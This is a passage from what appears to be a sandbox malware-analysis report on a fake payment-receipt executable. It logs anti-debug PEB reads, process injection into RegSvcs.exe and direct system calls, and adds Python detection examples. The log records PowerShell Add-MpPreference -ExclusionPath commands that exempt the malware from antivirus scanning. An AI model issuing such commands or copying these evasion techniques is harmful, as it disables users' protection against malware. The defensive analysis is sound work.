                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110F5B0 mov eax, dword ptr fs:[00000030h]9_2_0110F5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110F5B0 mov eax, dword ptr fs:[00000030h]9_2_0110F5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110F5B0 mov eax, dword ptr fs:[00000030h]9_2_0110F5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011045B1 mov eax, dword ptr fs:[00000030h]9_2_011045B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011045B1 mov eax, dword ptr fs:[00000030h]9_2_011045B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0119F5BE mov eax, dword ptr fs:[00000030h]9_2_0119F5BE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011735BA mov eax, dword ptr fs:[00000030h]9_2_011735BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011735BA mov eax, dword ptr fs:[00000030h]9_2_011735BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011735BA mov eax, dword ptr fs:[00000030h]9_2_011735BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011735BA mov eax, dword ptr fs:[00000030h]9_2_011735BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011605A7 mov eax, dword ptr fs:[00000030h]9_2_011605A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011605A7 mov eax, dword ptr fs:[00000030h]9_2_011605A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011605A7 mov eax, dword ptr fs:[00000030h]9_2_011605A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011015A9 mov eax, dword ptr fs:[00000030h]9_2_011015A9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011015A9 mov eax, dword ptr fs:[00000030h]9_2_011015A9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011015A9 mov eax, dword ptr fs:[00000030h]9_2_011015A9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011015A9 mov eax, dword ptr fs:[00000030h]9_2_011015A9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011015A9 mov eax, dword ptr fs:[00000030h]9_2_011015A9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111A5D0 mov eax, dword ptr fs:[00000030h]9_2_0111A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111A5D0 mov eax, dword ptr fs:[00000030h]9_2_0111A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0115D5D0 mov eax, dword ptr fs:[00000030h]9_2_0115D5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0115D5D0 mov ecx, dword ptr fs:[00000030h]9_2_0115D5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011095DA mov eax, dword ptr fs:[00000030h]9_2_011095DA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B35D7 mov eax, dword ptr fs:[00000030h]9_2_011B35D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B35D7 mov eax, dword ptr fs:[00000030h]9_2_011B35D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B35D7 mov eax, dword ptr fs:[00000030h]9_2_011B35D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011155C0 mov eax, dword ptr fs:[00000030h]9_2_011155C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011B55C9 mov eax, dword ptr fs:[00000030h]9_2_011B55C9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111E5CF mov eax, dword ptr fs:[00000030h]9_2_0111E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111E5CF mov eax, dword ptr fs:[00000030h]9_2_0111E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E65D0 mov eax, dword ptr fs:[00000030h]9_2_010E65D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011015F4 mov eax, dword ptr fs:[00000030h]9_2_011015F4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011015F4 mov eax, dword ptr fs:[00000030h]9_2_011015F4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011015F4 mov eax, dword ptr fs:[00000030h]9_2_011015F4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011015F4 mov eax, dword ptr fs:[00000030h]9_2_011015F4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011015F4 mov eax, dword ptr fs:[00000030h]9_2_011015F4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_011015F4 mov eax, dword ptr fs:[00000030h]9_2_011015F4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010E25E0 mov eax, dword ptr fs:[00000030h]9_2_010E25E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110E5E7 mov eax, dword ptr fs:[00000030h]9_2_0110E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110E5E7 mov eax, dword ptr fs:[00000030h]9_2_0110E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110E5E7 mov eax, dword ptr fs:[00000030h]9_2_0110E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110E5E7 mov eax, dword ptr fs:[00000030h]9_2_0110E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110E5E7 mov eax, dword ptr fs:[00000030h]9_2_0110E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110E5E7 mov eax, dword ptr fs:[00000030h]9_2_0110E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110E5E7 mov eax, dword ptr fs:[00000030h]9_2_0110E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110E5E7 mov eax, dword ptr fs:[00000030h]9_2_0110E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111C5ED mov eax, dword ptr fs:[00000030h]9_2_0111C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111C5ED mov eax, dword ptr fs:[00000030h]9_2_0111C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01167410 mov eax, dword ptr fs:[00000030h]9_2_01167410
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01118402 mov eax, dword ptr fs:[00000030h]9_2_01118402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01118402 mov eax, dword ptr fs:[00000030h]9_2_01118402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01118402 mov eax, dword ptr fs:[00000030h]9_2_01118402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110340D mov eax, dword ptr fs:[00000030h]9_2_0110340D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111A430 mov eax, dword ptr fs:[00000030h]9_2_0111A430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DC427 mov eax, dword ptr fs:[00000030h]9_2_010DC427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DE420 mov eax, dword ptr fs:[00000030h]9_2_010DE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DE420 mov eax, dword ptr fs:[00000030h]9_2_010DE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010DE420 mov eax, dword ptr fs:[00000030h]9_2_010DE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01166420 mov eax, dword ptr fs:[00000030h]9_2_01166420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01166420 mov eax, dword ptr fs:[00000030h]9_2_01166420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01166420 mov eax, dword ptr fs:[00000030h]9_2_01166420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01166420 mov eax, dword ptr fs:[00000030h]9_2_01166420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01166420 mov eax, dword ptr fs:[00000030h]9_2_01166420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01166420 mov eax, dword ptr fs:[00000030h]9_2_01166420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01166420 mov eax, dword ptr fs:[00000030h]9_2_01166420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0119F453 mov eax, dword ptr fs:[00000030h]9_2_0119F453
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0110245A mov eax, dword ptr fs:[00000030h]9_2_0110245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EB440 mov eax, dword ptr fs:[00000030h]9_2_010EB440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EB440 mov eax, dword ptr fs:[00000030h]9_2_010EB440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EB440 mov eax, dword ptr fs:[00000030h]9_2_010EB440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EB440 mov eax, dword ptr fs:[00000030h]9_2_010EB440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EB440 mov eax, dword ptr fs:[00000030h]9_2_010EB440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010EB440 mov eax, dword ptr fs:[00000030h]9_2_010EB440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_010D645D mov eax, dword ptr fs:[00000030h]9_2_010D645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111E443 mov eax, dword ptr fs:[00000030h]9_2_0111E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111E443 mov eax, dword ptr fs:[00000030h]9_2_0111E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111E443 mov eax, dword ptr fs:[00000030h]9_2_0111E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111E443 mov eax, dword ptr fs:[00000030h]9_2_0111E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111E443 mov eax, dword ptr fs:[00000030h]9_2_0111E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111E443 mov eax, dword ptr fs:[00000030h]9_2_0111E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111E443 mov eax, dword ptr fs:[00000030h]9_2_0111E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0111E443 mov eax, dword ptr fs:[00000030h]9_2_0111E443
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (2 occurrences)
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Memory allocated: page read and write | page guard
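Every Code function entry above is one `mov reg, dword ptr fs:[30h]` in the code running inside RegSvcs.exe: in a 32-bit (WOW64) process fs:[30h] is the PEB pointer. Whether such a read is an anti-debug check or ordinary runtime code depends on the field the next instructions touch: BeingDebugged (+0x02) and NtGlobalFlag (+0x68) are the classic debugger checks, while Ldr (+0x0C) and ProcessHeap (+0x18) are read by every loader and heap routine, so the raw count of fs:[30h] loads does not by itself separate the two. The report lists only the load, so the classification needs the disassembly that follows it. The Python below is an added example, not part of the report or of the sample: it folds a constructed excerpt of the listing into per-function counts and classifies two constructed disassembly snippets by the PEB field they read; the snippets, the `debugger_present` label and the excerpt are all constructed for the example, the PEB offsets are the 32-bit ones.

```python
import re
from collections import Counter

# 32-bit PEB field offsets (the layout a WOW64 process such as this RegSvcs.exe sees).
PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x10: "ProcessParameters",
              0x18: "ProcessHeap", 0x68: "NtGlobalFlag"}
ANTI_DEBUG_FIELDS = {"BeingDebugged", "NtGlobalFlag"}

CODE_FN_RE = re.compile(r"Code function:\s*(?P<fn>\S+)\s+mov\s+(?P<reg>e[a-z]{2}),\s*dword ptr fs:\[(?P<off>[0-9A-Fa-f]+)h\]")
INSN_RE = re.compile(r"^\s*(?P<mn>[a-z]+)\s+(?P<ops>.+?)\s*$", re.I)
SEG_RE = re.compile(r"fs:\[(?P<off>[0-9A-Fa-f]+)h?\]", re.I)
MEM_RE = re.compile(r"\[(?P<base>e[a-z]{2})\s*(?:\+\s*(?P<off>[0-9A-Fa-f]+)h?)?\]", re.I)

# Constructed excerpt in the report's own format (two of the functions listed above).
REPORT_LINES = [
    "Source: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe | Code function: 9_2_011B4500 mov eax, dword ptr fs:[00000030h]",
    "Source: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe | Code function: 9_2_011B4500 mov eax, dword ptr fs:[00000030h]",
    "Source: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe | Code function: 9_2_010E2582 mov eax, dword ptr fs:[00000030h]",
    "Source: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe | Code function: 9_2_010E2582 mov ecx, dword ptr fs:[00000030h]",
]

def count_peb_loads(lines):
    """Fold the one-line-per-instruction listing into (function, register) counts."""
    counts = Counter()
    for line in lines:
        m = CODE_FN_RE.search(line)
        if m and int(m["off"], 16) == 0x30:
            counts[(m["fn"], m["reg"].lower())] += 1
    return counts

# Constructed disassembly of the kind the listing does NOT show: the instructions after
# the PEB load are what decide between an anti-debug check and ordinary heap/loader code.
ANTI_DEBUG_ASM = """
    mov   eax, dword ptr fs:[00000030h]
    movzx eax, byte ptr [eax+2]
    test  eax, eax
    jne   debugger_present
    mov   ecx, dword ptr fs:[00000030h]
    mov   ecx, dword ptr [ecx+68h]
    and   ecx, 70h
    jnz   debugger_present
"""

BENIGN_ASM = """
    mov   eax, dword ptr fs:[00000030h]
    mov   eax, dword ptr [eax+18h]
    push  eax
    call  RtlAllocateHeap
"""

def classify_peb_reads(asm):
    """Track registers loaded from fs:[30h] and name each PEB field read through them."""
    peb_regs, findings = set(), []
    for raw in asm.strip().splitlines():
        m = INSN_RE.match(raw)
        if not m:
            continue
        mn = m["mn"].lower()
        ops = [o.strip() for o in m["ops"].split(",")]
        dest, src = ops[0].lower(), (ops[1] if len(ops) > 1 else "")
        seg = SEG_RE.search(src)
        if mn == "mov" and seg and int(seg["off"], 16) == 0x30:
            peb_regs.add(dest)            # dest now holds the PEB pointer
            continue
        mem = MEM_RE.search(src)
        if mem and mem["base"].lower() in peb_regs:
            off = int(mem["off"], 16) if mem["off"] else 0
            findings.append((off, PEB_FIELDS.get(off, f"PEB+0x{off:X}")))
        if dest in peb_regs and mn in ("mov", "movzx", "movsx", "lea", "pop", "xor", "add", "sub", "and", "or"):
            peb_regs.discard(dest)        # register overwritten, no longer the PEB pointer
    return findings

def is_anti_debug(asm):
    """True when the snippet reads BeingDebugged or NtGlobalFlag (0x70 = heap debug flags)."""
    return any(name in ANTI_DEBUG_FIELDS for _, name in classify_peb_reads(asm))

if __name__ == "__main__":
    for (fn, reg), n in sorted(count_peb_loads(REPORT_LINES).items()):
        print(f"{fn}: {n} PEB load(s) into {reg}")
    for label, asm in (("anti-debug", ANTI_DEBUG_ASM), ("heap", BENIGN_ASM)):
        print(label, classify_peb_reads(asm), "anti-debug" if is_anti_debug(asm) else "benign")
```

The tracker deliberately stops following a register once it is overwritten, which is what makes the `movzx eax, byte ptr [eax+2]` case come out as a single BeingDebugged read rather than a chain of false hits.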

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe"
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe"
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtAllocateVirtualMemory: Direct from: 0x76EF48EC
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtQueryAttributesFile: Direct from: 0x76EF2E6C
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtQuerySystemInformation: Direct from: 0x76EF48CC
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtOpenSection: Direct from: 0x76EF2E0C
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtDeviceIoControlFile: Direct from: 0x76EF2AEC
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtQueryInformationToken: Direct from: 0x76EF2CAC
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtCreateFile: Direct from: 0x76EF2FEC
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtOpenFile: Direct from: 0x76EF2DCC
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtTerminateThread: Direct from: 0x76EF2FCC
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtOpenKeyEx: Direct from: 0x76EF2B9C
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtSetInformationProcess: Direct from: 0x76EF2C5C
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtProtectVirtualMemory: Direct from: 0x76EF2F9C
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtWriteVirtualMemory: Direct from: 0x76EF2E3C
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtNotifyChangeKey: Direct from: 0x76EF3C2C
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtCreateMutant: Direct from: 0x76EF35CC
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtResumeThread: Direct from: 0x76EF36AC
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtMapViewOfSection: Direct from: 0x76EF2D1C
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtProtectVirtualMemory: Direct from: 0x76EE7B2E
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtQuerySystemInformation: Direct from: 0x76EF2DFC
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtReadFile: Direct from: 0x76EF2ADC
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtDelayExecution: Direct from: 0x76EF2DDC
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtQueryInformationProcess: Direct from: 0x76EF2C26
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtResumeThread: Direct from: 0x76EF2FBC
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtCreateUserProcess: Direct from: 0x76EF371C
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtWriteVirtualMemory: Direct from: 0x76EF490C
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtSetInformationThread: Direct from: 0x76EE63F9
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtSetInformationThread: Direct from: 0x76EF2B4C
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtReadVirtualMemory: Direct from: 0x76EF2E8C
                Source: C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe | NtCreateKey: Direct from: 0x76EF2C6C
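The "Direct from" entries above record, for each Nt* call made by VfJW2xm7a.exe, the address the system call was issued from rather than a call into ntdll's exported stub, which is how direct and indirect syscalls surface in a sandbox trace. The check an EDR or a memory-forensics script applies is the same: the frame that executes the syscall instruction must lie inside ntdll.dll, because every legitimate path (kernel32 / kernelbase / the CLR) ends in ntdll's stub; a return address in an unbacked region or inside the sample's own image means the stub was bypassed. Whether this run's 0x76EExxxx/0x76EFxxxx addresses fall inside ntdll cannot be decided from this excerpt, which carries no module list for the process. The Python below is an added example, not part of the report: the module map, the load addresses, the process name `payload.exe` and the sample trace are invented for the example; the parser accepts the report's own "NtXxx: Direct from: 0x..." form so the real entries can be fed in once a module map from the full dump is at hand.

```python
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class Module:
    name: str
    base: int
    size: int

    def contains(self, addr: int) -> bool:
        return self.base <= addr < self.base + self.size

# Hypothetical module map for a 32-bit (WOW64) process. The load addresses are invented
# for this example; the report excerpt has no module list for the processes it traces.
MODULES = [
    Module("ntdll.dll",      0x77A00000, 0x001A0000),
    Module("kernelbase.dll", 0x76C10000, 0x00260000),
    Module("payload.exe",    0x00400000, 0x00080000),
]

# Nt* APIs whose use from outside ntdll is a strong injection / evasion signal.
SENSITIVE = {"NtAllocateVirtualMemory", "NtProtectVirtualMemory", "NtWriteVirtualMemory",
             "NtMapViewOfSection", "NtCreateUserProcess", "NtResumeThread",
             "NtSetContextThread", "NtQueueApcThread", "NtSetInformationThread"}

# Constructed trace: (api, return address of the frame that executed the syscall).
SAMPLE_CALLS = [
    ("NtQueryInformationProcess", 0x77A1B8C0),  # inside ntdll: reached via the exported stub
    ("NtWriteVirtualMemory",      0x00A30C14),  # unbacked RWX region: direct syscall
    ("NtMapViewOfSection",        0x00412F30),  # inside the payload image: direct syscall
    ("NtClose",                   0x00412F88),  # also direct, but a low-value API
]

def module_for(addr, modules=MODULES):
    return next((m for m in modules if m.contains(addr)), None)

def classify_syscall(api, ret_addr, modules=MODULES):
    """Return ('ntdll' | 'direct', reason). A caller that went through ntdll's stub leaves
    a return address inside ntdll; anything else bypassed the stub (direct or indirect
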